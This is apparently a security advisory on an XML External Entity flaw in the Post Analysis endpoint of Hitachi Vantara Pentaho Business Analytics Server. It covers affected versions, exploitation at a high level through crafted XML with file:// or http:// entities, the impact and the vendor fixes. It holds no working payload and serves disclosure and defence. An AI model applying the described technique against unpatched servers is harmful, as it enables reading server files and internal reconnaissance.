Hitachi Vantara Pentaho Business Analytics Server - Improper Restriction of XML External Entity Reference

Vulnerability

Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including all 8.3.x releases, do not correctly protect the Post Analysis service endpoint of the data access plugin against out-of-band XML External Entity Reference (XXE) attacks [1]. The flaw exists because the endpoint processes XML documents that may contain a Document Type Definition (DTD) allowing external entity definitions without proper restrictions.

Exploitation

An authenticated attacker can submit a crafted XML file to the vulnerable Post Analysis service endpoint [1]. The XML file defines an external entity using a URI with schemes such as file:// or http://. The server then processes the entity and may echo the retrieved data back in an error message or other response. No additional privileges beyond standard authentication are required; the attacker only needs network access to the affected service.

Impact

Successful exploitation allows an attacker to read arbitrary local files from the server (e.g., via file:// URI), potentially exposing sensitive configuration or data. Using http:// or other URI schemes, the attacker can force the server to make outgoing requests to internal or external hosts, enabling port scanning or other reconnaissance from the server's network position [1]. This constitutes information disclosure and can be used to bypass firewalls or hide the attack source.

Mitigation

As a workaround, the data access plugin can be removed from the software installation to mitigate the defect. The vendor recommends upgrading to Hitachi Vantara Pentaho Business Analytics Server version 9.3.0.2 (Long Term Support) or 9.4.0.1 or newer [1]. The fix is included in those releases. No information about CVE listing in CISA KEV is provided in the references.